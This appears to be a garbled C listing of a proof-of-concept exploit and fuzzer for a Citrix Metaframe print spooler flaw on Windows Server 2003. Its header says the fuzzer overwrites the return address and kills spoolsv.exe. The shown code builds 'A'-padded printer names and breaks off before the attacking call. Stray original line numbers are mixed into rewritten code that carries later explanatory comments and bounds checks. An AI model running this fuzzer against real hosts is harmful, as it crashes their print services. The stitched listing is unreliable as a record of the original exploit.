1 /*
2 Proof of concept exploit for ZDI - Citrix Metaframe spooler service vulnerability
3 Microsoft Windows - EnumPrinter() & EnumPrinterW() Fuzzer v0.1
4 Author: Andres Tarasco Acuña - atarasco@514.es
5 url: http://www.514.es
6
7 This is an initial version of the EnumPrinter() and OpenPrinter() fuzzer. I hope that
8 it will help to identify similar vulnerabilities.
9 Tested against win2k3 + Citrix Presentation Server. If the system is vulnerable,
10 this application will kill the spooler service (spoolsv.exe) and ret will be overwritten
11 with 0x00410041.
12
13 514 Tiger Team ownz u
14
15 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wchar.h>
#include <windows.h>
#include <Winspool.h>
#pragma comment(lib,"Winspool.lib")
20
21
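/*
 * usage - print the command-line synopsis and terminate the process.
 *
 * name - program name (normally argv[0]). A NULL name is printed as a
 *        placeholder so that printf never receives a null pointer.
 *
 * Does not return: exits with status 0, as the original did. The option
 * letters are plain ASCII '-' (the listing had them mangled into a
 * Unicode minus sign, which would never match a typed "-a"/"-u").
 */
void usage(const char *name)
{
    const char *prog = name ? name : "(program)";

    printf("Usage: %s -a (Ascii fuzzing for local printer providers)\n", prog);
    printf("Usage: %s -u (Unicode fuzzing for local printer providers)\n", prog);
    exit(0);
}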
27
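/* Option flags referenced elsewhere in the file; their exact use is not
 * visible in this part of the listing. OPT_UNICODE presumably selects the
 * wide-character path (the -u option) -- confirm against main(). Kept as
 * #defines because later code may test them with the preprocessor. */
#define RECURSIVE 1
#define OPT_UNICODE 2
/* Capacity of the shared fuzz buffer dst, in wchar_t units. */
#define MAX_PRINTER_LEN 4096

/* Padding lengths tried by Fuzzer(), which indexes this table by its
 * opt argument. Callers must keep opt within [0, 10). */
int CustomFuzzSize[] = {25, 50, 100, 150, 250, 300, 500, 1000, 1500, 2000};

/* Shared output buffer filled by Fuzzer(): MAX_PRINTER_LEN wchar_t, or
 * twice that many bytes when the narrow (ASCII) mode writes byte-wise. */
wchar_t dst[MAX_PRINTER_LEN];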
37
38
39
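/*
 * Fuzzer - build the test string in the global dst buffer.
 *
 * Copies orig into dst and appends CustomFuzzSize[opt] 'A' characters.
 * When unicode is non-zero, orig and dst are handled as UTF-16 (wchar_t)
 * strings; otherwise orig is treated as a narrow char string that the
 * caller passed through a wchar_t pointer, and dst is filled byte-wise.
 *
 * orig    - source name, NUL-terminated in the selected encoding.
 * opt     - index into CustomFuzzSize selecting the padding length.
 * unicode - non-zero for wide-character mode, zero for narrow mode.
 *
 * Returns nothing. dst is always left NUL-terminated: the copy and the
 * padding are clamped so they never run past the MAX_PRINTER_LEN buffer
 * (the original wrote unbounded), and the function leaves dst untouched
 * on a NULL orig or an out-of-range opt. The padding offset is the
 * measured length in the selected encoding; the original used wcslen()
 * even in narrow mode, which reads past a char string.
 */
void Fuzzer(wchar_t *orig, int opt, int unicode)
{
    const size_t nopts = sizeof(CustomFuzzSize) / sizeof(CustomFuzzSize[0]);
    /* Size of one character in the selected encoding, and the number of
     * such characters that fit in dst with room left for the terminator. */
    const size_t unit = unicode ? sizeof(wchar_t) : 1;
    const size_t capacity = sizeof(dst) / unit - 1;
    size_t len;
    size_t pad;
    size_t i;

    if (orig == NULL || opt < 0 || (size_t)opt >= nopts) {
        return;
    }

    len = unicode ? wcslen(orig) : strlen((const char *)orig);
    if (len > capacity) {
        len = capacity;   /* orig alone already fills the buffer */
    }
    pad = CustomFuzzSize[opt] > 0 ? (size_t)CustomFuzzSize[opt] : 0;
    if (pad > capacity - len) {
        pad = capacity - len;   /* keep the terminator inside dst */
    }

    memset(dst, 0, sizeof(dst));
    memcpy(dst, orig, len * unit);

    if (unicode) {
        for (i = 0; i < pad; i++) {
            dst[len + i] = L'A';
        }
    } else {
        char *bytes = (char *)dst;
        for (i = 0; i < pad; i++) {
            bytes[len + i] = 'A';
        }
    }

    /* Progress line, printed once per run on the first size step. */
    if (opt == 0) {
        if (unicode) {
            printf("Fuzzing: %S ( %i -%i)\n", dst,
                   CustomFuzzSize[0], CustomFuzzSize[nopts - 1]);
        } else {
            printf("Fuzzing: %s ( %i -%i)\n", (char *)dst,
                   CustomFuzzSize[0], CustomFuzzSize[nopts - 1]);
        }
    }
}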
61
62
63 DWORD ShowPrinterInfo(wchar_t *lpName, int lev